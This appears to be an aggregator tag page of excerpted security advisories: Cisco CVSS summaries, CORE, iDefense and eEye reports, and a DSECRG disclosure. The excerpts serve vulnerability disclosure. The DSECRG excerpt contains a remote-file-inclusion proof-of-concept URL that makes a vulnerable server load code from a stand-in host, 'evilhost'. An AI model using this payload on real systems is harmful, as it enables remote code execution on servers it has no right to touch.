New User, Welcome!     Login

<< Previous Next >>

exploitable

Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service Vulnerabilities

    Confidentiality Impact -   None
    Integrity Impact -         None
    Availability Impact -      Complete

CVSS Temporal Score - 6.4
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed


* CSCtc61990 - Coredump may be experienced when processing 

Cisco Security Advisory: Cisco IOS Software Network Address Translation Vulnerabilities

    Confidentiality Impact -   None
    Integrity Impact -         None
    Availability Impact -      Complete

CVSS Temporal Score - 6.4
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed


* CSCso02147 ("NAT of SIP over TCP Vulnerability")

Cisco Security Advisory: Jabber Extensible Communications Platform and Cisco Unified Presence XML Denial of Service Vulnerability

    Confidentiality Impact -   None
    Integrity Impact -         None
    Availability Impact -      Complete

CVSS Temporal Score - 6.4
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed

* CSCtq89842 ("CUP Server PE Vulnerable to XML Entity Expansion Attack")


CORE-2007-0821: Lotus Notes buffer overflow in the Lotus WorkSheet file processor

Vendors contacted: IBM Corp.
Release mode: COORDINATED RELEASE

*Vulnerability Information*
Class: Input validation error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: N/A
CVE Name: N/A

*Vulnerability Description*

[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171

http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php


1.2 Local File Include vulnerability found in script includes/events_application_top.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################


Cisco Security Advisory: Cisco IOS Software Border Gateway Protocol 4-Byte Autonomous System Number Vulnerabilities

Authentication          None
Confidentiality Impact  None
Availability Impact     Complete

CVSS Temporal Score - 6.7
Exploitability          Functional
Remediation Level       Official-Fix
Report Confidence       Confirmed
 
   
CSCta33973: Cisco IOS Software Crafted BGP Update Message Vulnerability

Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command Execution Vulnerability

    Confidentiality Impact -   Complete
    Integrity Impact -         Complete
    Availability Impact -      Complete

CVSS Temporal Score - 7.4
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed


* CSCtq63992 - CSM Arbitrary command execution vulnerability

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers

    Confidentiality Impact -   None
    Integrity Impact -         None
    Availability Impact -      Complete

CVSS Temporal Score - 6.4
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed


* CSCtt07949 - Cisco Wireless LAN Controllers IPv6 Denial of Service Vulnerability

iDefense Security Advisory 01.12.10: Adobe Reader and Acrobat JpxDecode Memory Corruption Vulnerability

privileges of the current user.

The vulnerability occurs when processing the Jp2c stream of a JpxDecode
encoded data stream within a PDF file. During the processing of a
JPC_MS_RGN marker, an integer sign extension may cause a bounds check
to be bypassed. This results in an exploitable memory corruption
vulnerability.

III. ANALYSIS

Exploitation of this vulnerability allows an attacker to execute

iDefense Security Advisory 03.24.09: Adobe Reader and Acrobat JBIG2 Encoded Stream Heap Overflow Vulnerability

Typically, heap based buffer overflows can be difficult to exploit due
to modern heap implementations that perform heap integrity checks.
However, Abode Reader and Acrobat use a custom heap allocator which can
be abused to write arbitrary values to arbitrary locations. Labs testing
has demonstrated this vulnerability is highly exploitable.

JavaScript is not required to exploit this vulnerability, however, it
does make exploitation simpler.

IV. DETECTION

EEYE: Multiple Vulnerabilities In .FLAC File Format and Various Media Applications

software.
Whenever vulnerable software open or process a malformed FLAC file, they
use the size fields for reference points to allocate memory (malloc) and
write the contents of these files into those memory buffers. Setting
these values to an overly large value, such as 0xFFFFFFFF, could cause
an exploitable condition. Passing a size of 0xFFFFFFFF would cause a
malloc(0) immediately followed by a buffer overflow on the read. This
results in an exploitable heap overflow. Exploitation is dependent on
the data allocation location, heap structure and error handlers of the
affected software. After overwriting a large amount of memory and
pointers with arbitrary data, code execution could then be redirected to

Cisco Security Advisory: Vulnerabilities in Cisco Video Surveillance Products

Integrity Impact        - None
Availability Impact     - Complete

CVSS Temporal Score - 6.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

CSCsu05515 - SD Camera Web Server Will Display any File on System


Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service Vulnerabilities

Integrity Impact        - None
Availability Impact     - Complete

CVSS Temporal Score - 6.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

CSCsz40392 - CCM: Coredump in sipSafeStrlen from malicious INVITE


Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service Vulnerabilities

Integrity Impact        - None
Availability Impact     - Complete

CVSS Temporal Score - 6.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

CSCtc47823 - CCM Core at invalid Line# in SCCP RegAvailableLines and FwdStatReq


Cisco Security Advisory: Cisco IOS Software Internet Key Exchange Resource Exhaustion Vulnerability

Integrity Impact        - None
Availability Impact     - Complete

CVSS Temporal Score - 6.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

CSCee72997 - P1 SA stuck in KEY_EXCH forever


Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers

        Integrity Impact         - None
        Availability Impact      - Complete

CVSS Temporal Score - 6.4

        Exploitability           - Functional
        Remediation Level        - Official-Fix
        Report Confidence        - Confirmed

CSCsw40789 - SSH connections denial of service vulnerability
+-----------------------------------------------------

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers

    Confidentiality Impact -   None
    Integrity Impact -         None
    Availability Impact -      Complete

CVSS Temporal Score - 5.0
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed

* Crash handling invalid post for webauth (CSCsq44516)


Cisco Security Advisory: Multiple vulnerabilities in Cisco PGW Softswitch

  Confidentiality Impact  None
  Integrity Impact        None
  Availability Impact     Complete

CVSS Temporal Score - 6.4
  Exploitability          Functional
  Remediation Level       Official Fix
  Report Confidence       Confirmed

CSCsk32606 - Malformed SIP packet can crash device 
CSCsk40030 - Malformed Session Attribute can crash device

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Digital Media Manager

    Confidentiality Impact -   Complete
    Integrity Impact -         Complete
    Availability Impact -      Complete

CVSS Temporal Score - 8.7
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed

* CSCtc46008 ("Privilege Escalation on DMM")


Cisco Security Advisory: Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerabilities

Confidentiality Impact  None
Integrity Impact        None
Availability Impact     Complete

CVSS Temporal Score - 6.4
Exploitability          Functional
Remediation Level       Official Fix
Report Confidence       Confirmed

CSCsz43987 - IOS coredump when sending crafted packets


Cisco Security Advisory: Cisco IOS SSL VPN Vulnerability

Confidentiality Impact  None
Integrity Impact        None
Availability Impact     Complete

CVSS Temporal Score - 6.4
Exploitability          Functional
Remediation Level       Official Fix
Report Confidence       Confirmed

Impact
======

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine

Integrity Impact        - None
Availability Impact     - Complete

CVSS Temporal Score - 6.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

CSCtb54493 - HTTP, RTSP, and SIP Inspection DoS Vulnerability


Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Manager

    Confidentiality Impact -   Partial
    Integrity Impact -         Partial
    Availability Impact -      Partial

CVSS Temporal Score - 6.2
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed

* CSCtf97085 - Java RMI Command Injection


Cisco Security Advisory: Cisco TelePresence Recording Server Default Credentials for Root Account Vulnerability

    Confidentiality Impact -   Complete
    Integrity Impact -         Complete
    Availability Impact -      Complete

CVSS Temporal Score - 8.7
    Exploitability -           High
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed


Impact

Cisco Security Advisory: Open Query Interface in Cisco Unified Communications Manager and Cisco Unified Presence Server

    Confidentiality Impact -   Complete
    Integrity Impact -         Complete
    Availability Impact -      Complete

CVSS Temporal Score - 8.3
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed


* CSCto63060 - Open Query Interface

Cisco Security Advisory: Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras

    Confidentiality Impact -   None
    Integrity Impact -         None
    Availability Impact -      Complete

CVSS Temporal Score - 6.4
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed
    

Impact

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unity Connection

    Confidentiality Impact -   Complete
    Integrity Impact -         Complete
    Availability Impact -      Complete

CVSS Temporal Score - 7.4
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed


* CSCtq67899 - Cisco Unity Denial Of Service Vulnerability

CORE-2009-0814: HP Openview NNM 7.53 Invalid DB Error Code vulnerability

2. *Vulnerability Information*

Class: External Initialization of Trusted Variables [CWE-454]
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840



CORE-2007-0930 Path Traversal vulnerability in VMware's shared folders implementation

Release mode: User release

*Vulnerability Information*

Class: Input Validation Error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Client-side Exploitable: No
Bugtraq ID: 27944
CVE Name: CVE-2008-0923


CORE-2010-0407: Microsoft Office Excel PivotTable Cache Data Record Buffer Overflow

2. *Vulnerability Information*

Class: Buffer Overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-2562
Bugtraq ID: 42199



<<Previous Next>>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!